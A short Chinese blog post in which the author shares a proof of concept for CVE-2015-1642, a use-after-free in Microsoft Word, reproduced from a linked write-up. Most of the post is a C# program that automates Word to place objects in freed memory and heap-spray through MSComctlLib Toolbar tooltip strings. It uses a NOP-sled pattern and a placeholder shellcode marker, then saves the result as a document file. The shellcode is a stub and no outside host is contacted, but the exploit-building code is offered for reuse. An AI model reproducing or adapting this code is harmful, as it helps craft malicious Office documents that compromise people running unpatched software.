月初,玄武实验室的“每日安全动态”推送了一篇office UAF漏洞利用的文章,之前对office上UAF漏洞利用占位问题有些疑问,刚好就借助这篇文章重现了一下。其中堆喷射部分不是特别稳定,漏洞成因和利用的细节请参见原文链接。今天想起来,就把POC发这里吧。
原文链接:Understanding Microsoft Word OLE Exploit Primitives: Exploiting CVE-2015-1642 CTaskSymbol UAF by @ d0mzw https://t.co/NPJUJUqNSH
1 namespace WindowsFormsApplication1 2 { 3 public partial class Form1 : Form 4 { 5 public Form1() 6 { 7 InitializeComponent(); 8 } 9 10 private void HeapSpray(Word.Document objDoc) 11 { 12 Word.InlineShape[] ocx = new Word.InlineShape[30]; 13 MSComctlLib.Toolbar[,] toolbarArray = new MSComctlLib.Toolbar[30, 2]; 14 15 int block_size = 0x1000; 16 17 string padding = "\u8080\u8080"; 18 while (padding.Length < 0x1000) 19 { 20 padding += "\u2121\u2121"; 21 } 22 padding = padding.Substring(0, (0x9f2 - 0xc) / 2); 23 24 // 0a0a0a0a points here 25 string shellcode = "\uC0DE\uC0DE"; 26 27 string pattern = "\u9090\u9090"; 28 while (pattern.Length < block_size) 29 { 30 pattern += pattern; 31 } 32 pattern = pattern.Substring(0, 0x800 - padding.Length - shellcode.Length); 33 34 string block = padding + shellcode + pattern; 35 while (block.Length < 0xfffe0 / 2) 36 { 37 block += block; 38 } 39 40 string chunk = block.Substring(0, (0xfffe0 - 0x6) / 2); 41 42 //MessageBox.Show("[+] objAlloc size: 0x" + (chunk.Length * 0x2 + 0x4 + 0x2).ToString("X")); 43 44 for (int i = 0; i < 30; i++) 45 { 46 ocx[i] = objDoc.InlineShapes.AddOLEControl("MSComctlLib.Toolbar"); 47 for (int j = 0; j < 2; j++) 48 { 49 toolbarArray[i, j] = ((MSComctlLib.Toolbar)ocx[i].OLEFormat.Object); 50 toolbarArray[i, j].Buttons.Add().ToolTipText = chunk; 51 } 52 } 53 } 54 55 private void DefragmenHeap(Word.Document objDoc, Word.InlineShape[] ocx) 56 { 57 string paddingB = "\u0c0c\u0c0c"; 58 while (paddingB.Length < 0x60 / 2) 59 { 60 paddingB += paddingB; 61 } 62 string objAllocB = paddingB.Substring(0, 0x5a / 2); 63 64 MSComctlLib.Toolbar[] tabArrayB = new MSComctlLib.Toolbar[16]; 65 ocx[2] = objDoc.InlineShapes.AddOLEControl("MSComctlLib.Toolbar"); 66 67 for (int j = 0; j < 16; j++) 68 { 69 tabArrayB[j] = (MSComctlLib.Toolbar)ocx[2].OLEFormat.Object; 70 tabArrayB[j].Buttons.Add().ToolTipText = objAllocB; 71 } 72 73 MSComctlLib.Toolbar[] tabArrayC = new MSComctlLib.Toolbar[16]; 74 ocx[3] = objDoc.InlineShapes.AddOLEControl("MSComctlLib.Toolbar"); 75 76 for (int j = 0; j < 16; j++) 77 { 78 tabArrayC[j] = (MSComctlLib.Toolbar)ocx[3].OLEFormat.Object; 79 tabArrayC[j].Buttons.Add().ToolTipText = objAllocB; 80 } 81 } 82 83 private void ReplaceHeap(Word.Document objDoc, Word.InlineShape[] ocx) 84 { 85 string paddingA = "\u0a06\u0a0a"; 86 while (paddingA.Length < 0x60 / 2) 87 { 88 paddingA += paddingA; 89 } 90 string objAllocA = paddingA.Substring(0, 0x5a / 2); 91 92 MSComctlLib.Toolbar[] tabArrayA = new MSComctlLib.Toolbar[16]; 93 ocx[0] = objDoc.InlineShapes.AddOLEControl("MSComctlLib.Toolbar"); 94 95 for (int j = 0; j < 16; j++) 96 { 97 tabArrayA[j] = (MSComctlLib.Toolbar)ocx[0].OLEFormat.Object; 98 tabArrayA[j].Buttons.Add().ToolTipText = objAllocA; 99 } 100 } 101 102 private void button1_Click(object sender, EventArgs e) 103 { 104 Word.Application objWord = new Word.Application(); 105 objWord.Visible = true; 106 107 object objMissing = System.Reflection.Missing.Value; 108 Word.Document objDoc = objWord.Documents.Add(ref objMissing, ref objMissing, ref objMissing, ref objMissing); 109 110 // How to: Programmatically Insert Text into Word Documents; 111 // https://msdn.microsoft.com/en-us/library/6b9478cs.aspx 112 113 Word.InlineShape[] ocx = new Word.InlineShape[4]; 114 115 ReplaceHeap(objDoc, ocx); 116 117 ocx[1] = objDoc.InlineShapes.AddOLEControl("MSComctlLib.Toolbar"); 118 119 DefragmenHeap(objDoc, ocx); 120 121 HeapSpray(objDoc); 122 123 // Null out the reference 124 object filename = Application.StartupPath + @"\test.docx"; 125 objDoc.SaveAs2(ref filename); 126 objDoc.Close(ref objMissing, ref objMissing, ref objMissing); 127 objDoc = null; 128 objWord.Quit(ref objMissing, ref objMissing, ref objMissing); 129 objWord = null; 130 } 131 } 132 }